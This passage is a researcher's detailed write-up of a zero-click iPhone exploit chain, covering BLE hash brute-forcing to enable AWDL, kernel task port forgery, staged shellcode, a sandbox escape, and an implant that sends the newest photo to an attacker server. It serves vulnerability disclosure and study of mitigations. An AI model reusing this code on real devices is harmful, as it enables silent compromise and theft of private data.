When a device wants to share a file via AirDrop it starts broadcasting a bluetooth low-energy advertisements which looks like this example, broadcast by MacOS:


[PACKET] [ CH:37|CLK:1591031840.920892|RSSI:-44dBm ] << BLE - Advertisement Packet | type=ADV_IND | addr=28:C4:72:91:05:D7 | data=02010617ff4c000512000000000000000001297f247ee56f62b300 >>


BLE advertisements are small, they have a maximum payload size of 31 bytes. The bundle of bytes at the end are actually four truncated 2-byte SHA256 hashes of the contact information of the device which is trying to share something. The contact information used are the email addresses and phone numbers associated with the device's logged-in iCloud account. You can generate the same truncated hashes like this:


In this case I'm using a test account with the iCloud email address: '[email protected]'


>>> import hashlib

>>> s = '[email protected]'

>>> hashlib.sha256(s.encode('utf-8')).hexdigest()[:4] 

'62b3'


Notice that this matches the two penultimate bytes in the advertisement frame shown above. The contact hashes are unsalted which can have some fun consequences if you live in a country with localized mobile phone numbers, but this is an understandable performance optimization.


All iOS devices are constantly receiving and processing BLE advertisement frames like this. In the case of these AirDrop advertisements, when the device is in the default "Contacts Only" mode, sharingd (which parses BLE advertisements) checks whether this unsalted, truncated hash matches the truncated hashes of any emails or phone numbers in the device's address book.


If a match is found this doesn't actually mean the sending device really is in the receiver's address book, just that there is a contact with a colliding hash. In order to resolve this the devices need to share more information and at this point the receiver enables AWDL to establish a higher-bandwidth communication channel.


The SEEMOO labs paper continues in great detail about how the two devices then really verify that the sender is in the receiver's address book, but we are only trying to get AWDL enabled so we're done. As long as we keep broadcasting the advertisement with the colliding hash the target's AWDL interface will remain active.

Blue in the teeth

The SEEMOO labs team paper discusses the custom firmware they wrote for a BBC micro:bit so I picked up a couple of those:


The BBC micro:bit is an education-focused dev board. This photo shows the rear of the board; the front has a 5x5 LED matrix and two buttons. They cost under $20.


These devices are intended for the education/maker market. It's a Nordic nRF51822 SOC with a Freescale KL26 acting as a USB programmer for the nRF51. BBC provide a small programming environment for it, but you can build any firmware image for the nRF51, plug in the micro:bit which appears as a mass-storage device thanks to the KL26 and drag and drop the firmware image on there. The programmer chip flashes the nRF51 for you and you can run your code. This is the device which the SEEMOO labs team used and wrote a custom firmware for.


Whilst playing around with the micro:bit I discovered the MIRAGE project, a generic and amazingly well documented project for doing all manner of radio security research. Their tools have a firmware for the micro:bit, and indeed, dropping their provided firmware image on to the micro:bit and running this:


sudo ./mirage_launcher ble_sniff SNIFFING_MODE=advertisements INTERFACE=microbit0


we're able to start sniffing BLE advertisements:


[PACKET] [ CH:37|CLK:1591006615.511192|RSSI:-46dBm ] << BLE - Advertisement Packet | type=ADV_IND | addr=58:6A:80:4F:41:74 | data=02011a020a0707ff4c000f020000 >>


Indeed, if you do this at home you'll likely see a barrage of BLE traffic from everything imaginable. Apple devices are particularly chatty, notice the frames sent each time your Airpods case is open and closed.


If we take a look at a couple of captured BTLE frames when we try to share a file via AirDrop, we can see there's clearly structure in there:


MacOS:

data=02010617ff4c000512000000000000000001fa5c2516bf07aba400

iOS 13:

data=02011a020a070eff4c000f05a035c928291002710c

 

             LEN    APPL T L  V

020106       17  ff 4c00 0512 000000000000000001 fa5c 2516 bf07 aba4 00

02011a020a07 0e  ff 4c00 0f05 a035c92829 1002 710c

                                

Definitely looks like more TLVs! With some reversing in sharingd we can figure out what these types are:


"Invalid" 0x0

"Hash" 0x1

"Company" 0x2

"AirPrint" 0x3

"ATVSetup" 0x4

"AirDrop" 0x5

"HomeKit" 0x6

"Prox" 0x7

"HeySiri" 0x8

"AirPlayTarget" 0x9

"AirPlaySource" 0xa

"MagicSwitch" 0xb

"Continuity" 0xc

"TetheringTarget" 0xd

"TetheringSource" 0xe

"NearbyAction" 0xf

"NearbyInfo" 0x10

"WatchSetup" 0x11


MacOS is sending AirDrop messages in the BLE advertisements. iOS is sending NearbyAction and NearbyInfo messages.

Brute forcing SHA256, or two bytes of it at least

For testing purposes we want some contacts on the device. Like the SEEMOO labs paper I generated 100 random contacts using a modified version of the AppleScript in this StackOverflow answer. Each contact has 4 contact identifiers: home and work email, home and work phone numbers.


We can also use MIRAGE to prototype brute forcing through the 16 bit space of truncated contact hashes. I wrote a MIRAGE module to broadcast Airdrop advertisements with incrementing truncated hashes. The MIRAGE micro:bit firmware doesn't support arbitrary broadcast frame injection but it is able to use the Raspberry Pi 4's built-in bluetooth controller. Running it for a while and looking at the console output from the iPhone we notice some helpful log messages showing up in Console.app:


Hashing: Error: failed to get contactsContainsShortHashes because (ratelimited)


The SEEMOO paper mentioned that they were able to brute force a truncated hash in a couple of seconds but it appears Apple have now added some rate limiting.


Spoofing different BT source MAC addresses didn't help but slowing the brute force attempts to one every 2 seconds or so seemed to please the rate limiting and in around 30 seconds, with average luck AWDL gets enabled and MI and PSF frames start to appear on the AWDL social channels.


As long as we keep broadcasting the same advertisement with the matching contact hash the AWDL interface will remain active. I didn't want to keep MIRAGE as a dependency so I ported the python prototype to use the linux native libbluetooth library and hci_send_cmd to build custom advertisement frames:


uint8_t payload[] = {0x02, 0x01, 0x06,

                     0x17,

                     0xff,

                     0x4c, 0x00, 

                     0x05, 

                     0x12, 

                     0x00, 0x00, 0x00, 0x00,

                     0x00, 0x00, 0x00, 0x00, 0x01, 

 

                     hash1[0], hash1[1],

                     hash2[0], hash2[1],

                     hash3[0], hash3[1],

                     hash4[0], hash4[1],

 

                     0x00};

 

le_set_advertising_data_cp data = {0};

data.length = sizeof(payload);

memcpy(data.data, payload, sizeof(payload));

hci_send_cmd(handle,

             OGF_LE_CTL,

             OCF_LE_SET_ADVERTISING_DATA,

             sizeof(payload)+1,

             &data);

Popping calc with zero clicks

Combining the AWDL exploit and BLE brute-force, we get a new demo:


With the phone left idle on the home screen and no user interaction we force the AWDL interface to activate using BLE advertisements. The AWDL exploit gains kernel memory read write in a few seconds after starting and the entire end to end exploit takes around a minute.


There may well be better, faster ways to force-enable AWDL but for my demo this will do.

Let's run an implant!

This demo is neat but really doesn't convey that we've compromised almost all the user's data, with no interaction. We can read and write kernel memory remotely. I know that Apple has invested significant effort in "post-exploitation" hardening so I wanted to demonstrate that with just this single vulnerability these could be defeated to the point where I could run something like a real-world implant which we've seen being deployed in real world exploitation against end users before. Trying to defend against an attacker with arbitrary memory read/write is a losing game, but there's a difference between saying that and you believing me, and proving it.

Speedy writer

We're going to need to write much more arbitrary data for this final step, so we need the arbitrary write to be even faster. There's one more optimization left.


Due to the order in which loads and stores occur in actionFrameReport we were able to build a primitive which gave us a timestamp valid for up to 1024ms and a large n_frames_in_last_second value. We used that to do one arbitrary add, then restarted the whole setup: replaced upper_peer's timestamp with 0, sent another frame to get a fresh timestamp and so on.


But why can't we just keep using the first timestamp and bundle more writes together? We can, it's just very important to take care that we don't exceed that 1024ms window. The exploit takes a very conservative approach here and uses only a few extra milliseconds. The reason is that we're running as a regular userspace program on a small system. We don't have anything like real-time scheduling guarantees. Linux kind-of supports running userspace programs on isolated cores to give something like a real-time experience, but for getting this demo exploit running it was sufficient to boost the priority of the exploit process with nice and leave a large safety window in the 1024ms. The code tries to bundle large buffer writes in chunks of 16 which provides a reasonable speed up.

Physmapping

Way back when I released the first demo exploit which disclosed random chunks of physical memory I had taken a look at how the physmap works on iOS.


Linux, Windows and XNU all have physmaps; they are a very convenient way of manipulating physical memory when your code has paging enabled and can't directly manipulate physical memory any more.


Abstractly, physmaps are virtual mappings of all of physical memory


The physmap is (typically) a 1:1 virtual mapping of physical memory. You can see in the diagram how the physical memory at the bottom might be split up into different regions, with some of those regions currently mapped in the kernel virtual address space. Some other physical memory regions might for example be used for userspace processes.


The physmap is the large kernel virtual memory region shown towards the right of the virtual address space, which is the same size as the amount of physical memory. The pagetables which translate virtual memory accesses in this region are set up in such a way that any access at an offset into the physmap virtual region gets translated to that same offset from the base of physical memory.


The physmap in XNU isn't set up exactly like that. Instead they use a "segmented physical aperture". In practise this means that they set up a number of smaller "sub-physmaps" inside the physmap region and populate a table called the PTOV table to allow translation from a physical address to a virtual address inside the physmap region:


pa: 0x000000080e978000 kva: 0xfffffff070928000 len: 0xde03c000 (3.7GB)

pa: 0x0000000808e14000 kva: 0xfffffff06ade4000 len: 0x05b44000 (95MB)

pa: 0x0000000801b80000 kva: 0xfffffff066000000 len: 0x04cb8000 (80MB)

pa: 0x0000000808d04000 kva: 0xfffffff06acf4000 len: 0x000f0000 (1MB)

pa: 0x0000000808df4000 kva: 0xfffffff06acd4000 len: 0x00020000 (130kb)

pa: 0x0000000808cec000 kva: 0xfffffff06acbc000 len: 0x00018000 (100kb)

pa: 0x0000000808a80000 kva: 0xfffffff06acb8000 len: 0x00004000 (16kb)

pa: 0x0000000808df4000 kva: 0xfffffff06acf4000 len: 0x00000000 (0kb)


There's one more important physical region not captured in the PTOV table which is the kernelcache image itself; this is found starting at gVirtBase and the kernel functions for translating between physical and physmap-virtual addresses take this into account.


The interesting thing is that the virtual protection of the pages in the physmap doesn't have to match the virtual protection of the pages as seen by a page table traversal from the perspective of a task. I wrote some test code using oob_timestamp to overwrite a portion of its own __TEXT segment in the physmap and it worked, allowing me to execute new native instructions. Could we execute userspace shellcode remotely by writing just directly into the physmap?

What happened to my physmap?

This works fine when prototyped using oob_timestamp modifying itself; but if you try to use it to target a system process, it panics. Something else is going on.

APRR, PPL and pmap_cs.

The canonical resource for APRR is s1guza's blog post. It's a hardware customization by Apple to add an extra layer of indirection to page protection lookups via a control register. The page-tables alone are no longer enough to determine the runtime memory protection of a page.


APRR is used in the Safari JIT hardening and in the kernel it's used to implement PPL (Page Protection Layer). For an in-depth look at PPL check out Brandon Azad's recent blog post.


PPL uses APRR to dynamically switch the page protections of two kernel regions, a text region containing code and a data region. Normally the PPL text region is not executable and the PPL data region is not writable. Important data structures have been moved into this PPL data region, including page tables and pmaps (the abstraction layer above page tables). All the code which modifies objects inside PPL data has been moved inside the PPL text segment.


But if the PPL text is non-executable, how can you run the code to modify the PPL data regions? And how can you make them writable?


The only way to execute the code inside the PPL text region is to go through a trampoline function which flips the APRR register bits to make the PPL text region executable and the PPL data region writable before jumping to the provided ppl_routine. Obviously great care has to be taken to ensure only code inside PPL text runs in this state.


Brandon likened this to a "kernel inside the kernel" which is a good way to look at it. Modifications to page tables and pmaps are now meant to only happen by the kernel making "PPL syscalls" to request the modifications, with the implementation of those PPL syscalls being inside the PPL text region. Check out Brandon's blog post for discussion of how to exploit a vulnerability in the PPL code to make those changes anyway!


It turns out that it's not just page tables and pmaps which PPL protects. Reversing more of the PPL routines there's a section of them starting around routine 38 which are implementing a new model of codesigning enforcement called pmap_cs.


Indeed, this pmap_cs string appears in the released XNU source, though attempts have been made to strip as much of the PPL related code as possible from the open source release. The vm_map_entry structure has this new field:


  /* boolean_t */ pmap_cs_associated:1, /* pmap_cs will validate */


From this code snippet from vm_fault.c it's pretty clear that pmap_cs is a new way to verify code signatures:


#if PMAP_CS

  if (fault_info->pmap_cs_associated &&

       pmap_cs_enforced(pmap) &&

       !m->vmp_cs_validated &&

       !m->vmp_cs_tainted &&

       !m->vmp_cs_nx &&

       (prot & VM_PROT_EXECUTE) &&

       (caller_prot & VM_PROT_EXECUTE)) {

         /*

          * With pmap_cs, the pmap layer will validate the

          * code signature for any executable pmap mapping.

          * No need for us to validate this page too:

          * in pmap_cs we trust...

          */

          vm_cs_defer_to_pmap_cs++;

  } else {

    vm_cs_defer_to_pmap_cs_not++;

    vm_page_validate_cs(m);

  }

#else /* PMAP_CS */

  vm_page_validate_cs(m);

#endif /* PMAP_CS */


vm_page_validate_cs is the old code-signing enforcement code, which can be easily tricked into allowing shellcode by changing the codesigning enforcement flags in the task's proc structure. The question is what determines whether the new pmap_cs model or the old approach is used?

A pmap_cs workaround

The fundamental question I'm trying to answer is why the physmap shellcode injection technique works for a test app I'm debugging, but not a system process, even when the system process's code signing flags have been modified such that it should be allowed to run unsigned code?


We can see a reference to pmap_cs_enforced in the snippet above but the definition of this method is stripped from the released XNU source code. With IDA we can see it's checking the byte at offset +0x108 in the pmap structure. Nowhere in the XNU code seems to manipulate this field though.


Reversing the pmap_cs PPL code we find that this field is referenced in pmap_cs_associate_internal_options, called by PPL routine 44.


This function has some helpful logging strings from which we can learn that it's being called to associate a code-signing structure with a virtual memory region. This code signing structure is a pmap_cs_code_directory, and we can determine from this panic log message:


if (trust_level != 3) {

  panic("\"trying to enter a binary in nested region with too low trust level %d\"", cd_entry->trust_level);

}


that the field at +0x54 represents the "trust level" of the binary.


Further down the function we can see this:


  if ( trust_level != 1 )

    goto LABEL_38;

  pmap->pmap_cs_enforced = 0;

   ...

  return KERN_NOT_SUPPORTED;


Probably my test apps signed by my developer certificate are getting this trust_level of 1 and therefore falling back to the old code-signing enforcement code. I had a hunch that maybe this also applied to third-party applications from the App Store; rather than painstakingly continuing to reverse engineer pmap_cs I just tried installing and running an App Store app (in this case, YouTube) on the phone then using oob_timestamp to dump the pmap structures for each running process. Indeed, there were three pmaps with pmap_cs_enforced set to 0: kernel_task (not so interesting because KTRR protects the kernel TEXT segment), oob_timestamp and YouTube!


This means that we can use the remote kernel read/write to inject shellcode into any third-party app running on the device. Of course, we don't want the prerequisite that the target needs to be running a third-party application, so we can use the technique developed earlier to open the calculator to instead spawn a third-party app. If the device doesn't have any third-party applications installed this technique wouldn't work, but we already have kernel memory read/write so there are many more avenues available for running code in some form on the device. But for now, we'll assume the target device has at least one App Store app installed.

Uploading payloads

Our arbitrary write is reasonably fast but still too slow for us to use it to write an entire payload into the physmap that way. Instead, let's create a staged loader.


We will try to write a minimal piece of initial shellcode via the physmap which will be run as the fake signal handler. Its only purpose will be to bootstrap a larger payload and jump to it. The idea will be to place fragments of our final payload in kernel memory which the bootstrap code will find, copy into userspace, make executable and jump to.

A useful memory leak

Earlier I discussed the service_response technique for building a heap groom. I noted that this was an almost perfect heap grooming primitive: we control the size of the allocations and can place arbitrary bytes at arbitrary offsets within them. I also noted that it seemed to be a true memory leak as even when the AWDL interface is disabled, the memory never gets freed.


This also seems like a great primitive for staging our payload. All we need to do is figure out the address of the leaked memory.


The parser for the service response TLV (type 2) which causes the memory wraps the kalloc'ed buffer in an IO80211ServiceRequestDescriptor object. The pointer to the buffer is at offset +0x40 in there.


The IO80211ServiceRequestDescriptor is then enqueued into an IO80211CommandQueue in the IO80211AWDLPeerManager at +0x2968 which I've called response_fragments:


  peer_manager->response_fragments->lockEnqueue(response)


The lockEnqueue method calls ::enqueue which will add the new element at the head of the queue's linked list if either of the two following checks pass:


if ( this->max_elems_per_bucket == 0x1000000 || 

     this->max_elems_per_bucket * this->num_buckets > this->count )


If these checks fail the enqueue method returns an error, but the processServiceResponseTLV method never checks this error. The reason we get a true memory leak here is because the peer_manager's response_fragments queue is created with max_elems_per_bucket set to 8, meaning that after 8 incomplete fragments have arrived no more will be enqueued. The service response code doesn't handle this case and the return value of lockEnqueue isn't checked. The code no longer has a pointer to the RequestDescriptor and it cannot be freed. This is in some ways convenient for the heap groom, but not at all convenient when we want to know the address of the allocation!

Fixing the memory leak, sort of...

Using the arbitrary write we can increase the queue limit to a much higher value, and now our code works and we can, with just a few frames, place controlled buffers of up to around 1000 bytes in kernel memory and find their addresses by parsing the queue structure . Here's the wrapper function for this functionality in the exploit:


uint16_t kmem_leak_peer_id = 0;

 

uint64_t

copy_buffer_to_kmem(void* buf,

                    size_t len,

                    uint16_t kalloc_size,

                    uint16_t offset) {

  struct ether_addr kmem_leak_peer = 

    *(ether_aton("22:99:33:71:00:00"));

 

  *(((uint16_t*)&kmem_leak_peer)+2) = kmem_leak_peer_id++;

 

  inject(RT(),

      WIFI(kl_parm.dst, kmem_leak_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      SERV_RESP_KALLOCER(buf, len, kalloc_size, offset),

      HT_CAPS(),

      DATAPATH(kmem_leak_peer),

      PKT_END());

 

  uint64_t serv_resp_q = rk64(kl_parm.peer_manager_kaddr+0x2968);

  uint64_t buckets = rk64(serv_resp_q+0x48);

  uint64_t elem = rk64(buckets+0x8);

  uint64_t ptr = rk64(elem+0x40);

 

  return ptr;

}

Giving shellcode kernel memory read/write

We're going to want our payload to be able to read and write kernel memory just like we already can remotely. The canonical way to do this is to give the code a send right to a task port representing the kernel task. There are some new mitigations around this in iOS 13 (and more in iOS 14) but they're easily worked around because we already have kernel read/write using a different primitive.


We find the real kernel vm_map, build a fake kernel task port object and task, ensuring the correct kalloc_zone magic values are in the right place, then use the upload primitive to place them in kernel memory and find the addresses:


// build a fake kernel task:

uint64_t kern_proc = 0xFFFFFFF00941B818 + kaslr_slide;

uint64_t kern_task = rk64(kern_proc+0x10);

uint64_t kern_map  = rk64(kern_task+0x28);

 

uint32_t fake_task_buf_size = 0x200;

uint8_t* fake_task_buf = malloc(fake_task_buf_size);

memset(fake_task_buf, 0, fake_task_buf_size);

 

*(uint16_t*)(fake_task_buf+0x16) = 0x39;   // zone index for tasks

 

uint8_t* fake_task = fake_task_buf + 0x100;

*(uint64_t*)(fake_task+0x000) = 0;        // lck_mtx_data

*(uint8_t*) (fake_task+0x00b) = 0x22;     // lck_mtx_type

*(uint32_t*)(fake_task+0x010) = 4;        // ref_cnt

*(uint32_t*)(fake_task+0x014) = 1;        // active

*(uint64_t*)(fake_task+0x028) = kern_map; // map

 

uint64_t fake_task_buf_kaddr = copy_buffer_to_kmem(

                                 fake_task_buf,

                                 fake_task_buf_size,

                                 0x8001,

                                 0);

 

uint64_t fake_task_kaddr = fake_task_buf_kaddr + 0x100;

 

// build a fake kernel task port:

uint64_t target_task_port = rk64(target_task + 0x108);

uint64_t ipc_space_kernel = rk64(target_task_port + 0x60);

 

uint32_t fake_port_buf_size = 0x200;

uint8_t* fake_port_buf = malloc(fake_task_buf_size);

memset(fake_port_buf, 0, fake_port_buf_size);

 

*(uint16_t*)(fake_port_buf+0x16) = 0x2a; // zone index for ipc ports

  

uint8_t* fake_port = fake_port_buf + 0x100;

*(uint32_t*)(fake_port+0x000) = 0x80000000 | 2;   // ip_bits  *(uint32_t*)(fake_port+0x004) = 4;                // ip_references

*(uint64_t*)(fake_port+0x060) = ipc_space_kernel; // ip_receiver

*(uint64_t*)(fake_port+0x068) = fake_task_kaddr;  // ip_kobject

*(uint32_t*)(fake_port+0x09c) = 1;                // ip_mscount

*(uint32_t*)(fake_port+0x0a0) = 1;                // ip_srights

 

uint64_t fake_port_buf_kaddr = copy_buffer_to_kmem(

                                 fake_port_buf, 

                                 fake_port_buf_size,

                                 0x8001,

                                 0);

 

uint64_t fake_port_kaddr = fake_port_buf_kaddr + 0x100;


We then need the stage0 code to be able to use this fake port. Canonically you would set this port as host special port 4, which the shellcode could then retrieve like this:


  host_get_special_port(host_priv_self(),

                        HOST_LOCAL_NODE,

                        4,

                        &kernel_task);


The issue is this requires a send right to the host_priv port, which the app we're injecting the shellcode into won't have. Jailbreaks sometimes work around this by making the regular host port into the host_priv port, but we don't want to do that as it also weakens some sandboxing primitives.


One option would be to add the port into the task's port namespace directly but this is a little fiddly. Instead, I chose to use a task special port. These are per-task ports, pointers to which are stored in the task struct:


struct task {

   ...

  struct ipc_port *itk_host;      /* a send right */

  struct ipc_port *itk_bootstrap; /* a send right */

  struct ipc_port *itk_seatbelt;  /* a send right */

  struct ipc_port *itk_gssd;      /* yet another send right */

  struct ipc_port *itk_debug_control; /* send right for debugmode communications */

  struct ipc_port *itk_task_access; /* and another send right */

  struct ipc_port *itk_resume;    /* a receive right to resume this task */

  struct ipc_port *itk_registered[TASK_PORT_REGISTER_MAX];

...


I chose to use task special port 7 which is the now unused TASK_SEATBELT_PORT itk_seatbelt.


We use our remote kernel read/write to write the fake kernel task pointer there:


wk64(target_task+0x2e0, fake_port_kaddr);


Then the stage0 shellcode just has to do:


mach_port_t kernel_task = MACH_PORT_NULL;

task_get_special_port(mach_task_self(), 7, &kernel_task);


to get a send right to a functional kernel task port and gain local kernel memory read/write.

A shellcode framework: stage0

We're going to use the remote kernel memory read to find a victim process, traverse that victim process's page tables to find the physical address of a TEXT page (we'll use the first page of the binary). We'll then find the address of the mapping of that physical page in the physmap and use the remote kernel memory write to write a shellcode stub in there. We'll use the same fake-signal injection technique to force the victim process to jump to the start of our shellcode.


Since our remote kernel memory write is relatively slow (dozens of bytes a second) we don't want to inject our entire payload this way, instead we'll split it into multiple stages with stage0 being the only stage injected in this way. stage0's only purpose is to bootstrap a second, larger stage1. Here's the assembly of stage0:


.section __TEXT,__text

  ; save sigreturn context:

  mov x20, x4

 

  ; save sigreturn token:

  mov x21, x5

 

  ; retrieve tfp0

  sub sp, sp, #0x10

  ldr w0, task_self_name

  mov w1, #7 ; TASK_SEATBELT_PORT

  mov x2, sp

  ldr x8, task_get_special_port

  blr x8

  ldr w19, [sp] ; tfp0!

 

  ; read stage1 into userspace

  mov w0, w19

  ldr x1, stage1_kaddr

  ldr w2, stage1_size

  mov x3, sp

  add x4, sp, #0x08

  ldr x8, mach_vm_read

  blr x8

 

  ; write stage1 into physmap

  mov w0, w19

  ldr x1, stage1_physmap_kaddr

  ldp x2, x3, [sp]

  ldr x8, mach_vm_write

  blr x8

  

  ldr x0, stage1_uaddr

  mov w1, #0x4000

  ldr x8, sys_icache_invalidate

  blr x8 

  

  ; jump to stage1

  mov w0, w19 ; tfp0

  mov x1, x20 ; sigreturn context

  mov x2, x21 ; sigretun token

 

  ldr x8, stage1_uaddr

  blr x8

 

task_self_name:

.word 0x49494949   

stage1_size:

.word 0x43434343

stage1_kaddr:

.quad 0x4141414141414141

mach_vm_read:

.quad 0x4242424242424242

stage1_physmap_kaddr:

.quad 0x4646464646464646

mach_vm_write:

.quad 0x4747474747474747

task_get_special_port:

.quad 0x4848484848484848

sys_icache_invalidate:

.quad 0x4b4b4b4b4b4b4b4b

stage1_uaddr:

.quad 0x4a4a4a4a4a4a4a4a


This could probably be smaller but will do for a demo.


At the bottom are constants; they'll get replaced by the exploit code just before they get written into the physmap. The exploit knows the userspace ASLR shift so is able to replace them with the correct runtime symbol values.


The shellcode retrieves the send right to the fake kernel task port we placed as task special port 7, uses it to read stage1 and immediately write it to the physmap. The last thing it does is invalidate the instruction cache by calling sys_icache_invalidate then it jumps to stage1:

Stage1

Writing assembly is fun, for a bit. We really want to run code written in C as soon as possible. With a bit of care it is possible to write shellcode in C. To make things as simple as possible for the loader we will have no external linkage (you can't directly call any library functions) and no global variables. We want a binary where we can extract the text and cstring sections, jump to the start of the text and it will run.


We do of course want to be able to call library functions which can be done with some macro hackery:


#define F(name, ...) \

   ((typeof(name)*)(_dlsym(RTLD_DEFAULT, #name)))(__VA_ARGS__)


This allows us to call arbitrary functions using a cstring of their name via dlsym, with the correct prototype. For example, varargs function will still work:


F(printf, "%s %d hello\n", foo, 123);


For this we will need one global variable; we don't want a data segment so we force it to be in __TEXT,__text:


#define FSYM(name) \

  typeof(name)* _##name __attribute__ ((section("__TEXT,__text"))) = (void*)(0x4141414141414141);

 

FSYM(dlsym);


This symbol will again be resolved by the exploit and replaced before stage1 is uploaded.


We define one more symbol, kdata, which we set to point to a configuration structure we also upload into the kernel heap somewhere. This configuration structure tells stage1 where to find the chunks which make up stage 2 so it can be rebuilt:


struct kconf {

  uint64_t kaslr_slide;

  uint32_t kbuf_size;

  uint32_t n_text_fragments;

  uint64_t text_fragments[100];

};


Here's stage1:


void

start(mach_port_t tfp0,

      void* sigreturn_context,

      void* sigreturn_token) {

  F(asl_log, NULL, NULL, ASL_LEVEL_ERR, "hello from stage1!");

 

  // read kconf from data:

  struct kconf kc;

  mach_vm_size_t out_size;

  F(mach_vm_read_overwrite,

      tfp0,

      kdata,

      sizeof(struct kconf),

      (mach_vm_address_t)(&kc),

      (mach_vm_size_t*)(&out_size));

        

  // compute the total size of stage2:

  uint32_t total_size = kc.n_text_fragments*1024;

 

  // roundup:

  total_size += 0x3fff;

  total_size &= (~0x3fff);

 

  // allocate a buffer for stage2:

  mach_vm_address_t base;

  mach_port_t self = F(task_self_trap);

  F(mach_vm_allocate,

      self,

      &base,

      total_size,

      VM_FLAGS_ANYWHERE);

 

  // read each fragment into the right place

  for (uint32_t i = 0; i < kc.n_text_fragments; i++) {

    F(mach_vm_read_overwrite,

        tfp0,

        kc.text_fragments[i],

        1024,

        base+(i*1024),

        &out_size);

  }

 

  // link _dlsym:

  uint64_t needle = 0x4141414141414141;

  volatile uint64_t* stage2_dlsym_addr = F(memmem,

                                             base,

                                             total_size,

                                             &needle,

                                             8);

 

  *stage2_dlsym_addr = _dlsym;

 

  // set the protection:

  F(mach_vm_protect,

      self,

      base,

      total_size,

      0,

      VM_PROT_READ | VM_PROT_EXECUTE);

 

    // jump to stage2:

  void (*stage2)(mach_port_t, void*) = base;

  stage2(tfp0, kdata);

}


We have a bit more leeway with the size of stage1; it can be up to around 1000 bytes.


It reads the configuration structure from the kernel, allocates memory for the final payload then reads in each chunk to the right place, sets the page protection accordingly and jumps to the final payload.

Escaping the sandbox from the outside

We've now removed any size restrictions on our payload so are free to write more complex code. The first step is to unsandbox the process we've ended up in. We can do this by replacing our credential structure with that of a more privileged process:


uint64_t kaslr_slide = r64(tfp0, kc+offsetof(struct kconf, kaslr_slide));

 

pid_t our_pid = F(getpid);

pid_t launchd_pid = 1;

    

uint64_t our_proc = 0;

uint64_t launchd_proc = 0;

    

// allproc

uint64_t proc = r64(tfp0, 0xFFFFFFF00941C940+kaslr_slide);

    

for (int i = 0; i < 1024; i++) {

  pid_t pid = r32(tfp0, proc+0x68);

  if (pid == our_pid) {

    our_proc = proc;

  }

  if (pid == launchd_pid) {

     launchd_proc = proc;

  }

        

  if (launchd_proc && our_proc) {

    break;

  }

        

  proc = r64(tfp0, proc+0);

}   

 

// get launchd's ucreds:

uint64_t launchd_ucred = r64(tfp0, launchd_proc+0x100); // p_ucred

    

// use them to unsandbox ourselves:

w64(tfp0, our_proc+0x100, launchd_ucred);


We're still bound by the global platform_profile sandbox but this is enough to grant access to almost all user data.

A minimal implant

At this point we basically have unfettered access to user data; we can read emails, private messages, photos, contacts, stream the camera and audio live and so on. I don't want to spend another month writing a fully-featured implant though so I decided to just steal the most recently taken photo:


Reading some mobile forensics websites we can see that iOS stores photos taken by the camera in /private/var/mobile/Media/DCIM/100APPLE.


We can use the unix readdir API to enumerate that directory and find the most recently created file with the extension .HEIC:


#define timespec_cmp(a, b, CMP)     \

( ((a)->tv_sec == (b)->tv_sec) ?    \

  ((a)->tv_nsec CMP (b)->tv_nsec) : \

  ((a)->tv_sec CMP (b)->tv_sec))

 

struct dirent* ep;

while (ep = F(readdir, dp)) {

  F(asl_log, NULL, NULL, ASL_LEVEL_ERR, ep->d_name);

  if (!F(strstr, ep->d_name, ".HEIC")) {

    // only interested in photos taken by the camera

    continue;

  }

  char* fullpath;

  F(asprintf, &fullpath, "%s/%s", dirpath, ep->d_name);

  struct stat st;

  F(stat, fullpath, &st);

  if (timespec_cmp(&st.st_birthtimespec, &newest_timespec, >)) {

    newest_photo_path = fullpath;

    newest_timespec = st.st_birthtimespec;

  } else {

    F(free, fullpath);

  }

}


Then we just create a TCP socket, connect to a server we control and write the contents of that file to the socket:


int sock = F(socket, PF_INET, SOCK_STREAM, 0);

struct sockaddr_in addr = {0};

addr.sin_family = PF_INET;

addr.sin_port = htons(1234);

addr.sin_addr.s_addr = F(inet_addr, "10.0.1.2");

    

int conn_err = F(connect,sock, &addr, sizeof(addr));

if (conn_err) {

  F(asl_log, NULL, NULL, ASL_LEVEL_ERR, "connect failed");

  F(sleep, 1000);

}

    

size_t photo_size = 0;

char* photo_buf = load_file(newest_photo_path, &photo_size);

 

F(write,sock, photo_buf, photo_size);

F(close, sock);

Process continuation

stage0 saved the sigreturn context and token which can now be used to let this thread continue safely. A real implant could now continue running in a separate thread and perform the necessary cleanup in the kernel to ensure AWDL can be safely disabled and the implant can continue to run in the background. For us this is where the journey ends.

End-to-end demo


This demo shows the attacker successfully exploiting a victim iPhone 11 Pro device located in a different room through a closed door. The victim is using the Youtube app. The attacker forces the AWDL interface to activate then successfully exploits the AWDL buffer overflow to gain access to the device and run an implant as root. The implant has full access to the user's personal data, including emails, photos, messages, keychain and so on. The attacker demonstrates this by stealing the most recently taken photo. Delivery of the implant takes around two minutes, but with more engineering investment there's no reason this prototype couldn't be optimized to deliver the implant in a handful of seconds.

Conclusion

My exploit is pretty rough around the edges. With some proper engineering and better hardware, once AWDL is enabled the entire exploit could run in a handful of seconds. There are likely also better techniques for getting AWDL enabled in the first place rather than the hash bruteforce. My goal was to build a compelling demo of what can be achieved by one person, with no special resources, and I hope I've achieved that.


There are further aspects I didn't cover in this post: AWDL can be remotely enabled on a locked device using the same attack, as long as it's been unlocked at least once after the phone is powered on. The vulnerability is also wormable; a device which has been successfully exploited could then itself be used to exploit further devices it comes into contact with.


The inevitable question is: But what about the next silver bullet: memory tagging (MTE)? Won't it stop this from happening?


My answer would be that Pointer Authentication was also pitched as ending memory corruption exploitation. When push came to shove, to actually ship a legacy codebase like the iOS kernel with Pointer Authentication, the primitives built using it and inserted by the compiler had to be watered down to such an extent that any competent attacker should have been able to modify their exploits to work around them. Undoubtedly this would have forced some extra work and probably some vulnerabilities were no longer as useful, but it's hard to quantify the true impact without knowing what vulnerabilities these attackers were also sitting on in preparation for exactly this eventuality. Pointer authentication shouldn't have come as a shock to any exploit developer, it had been expected for years.


Similarly, the ARM 8.5 specification containing the definitions of the Memory Tagging instructions has been publicly available for the last two years, that's plenty of time for attackers to prepare with publicly available information. It's reasonable to expect that top tier attacker groups also have insider/private information as well.


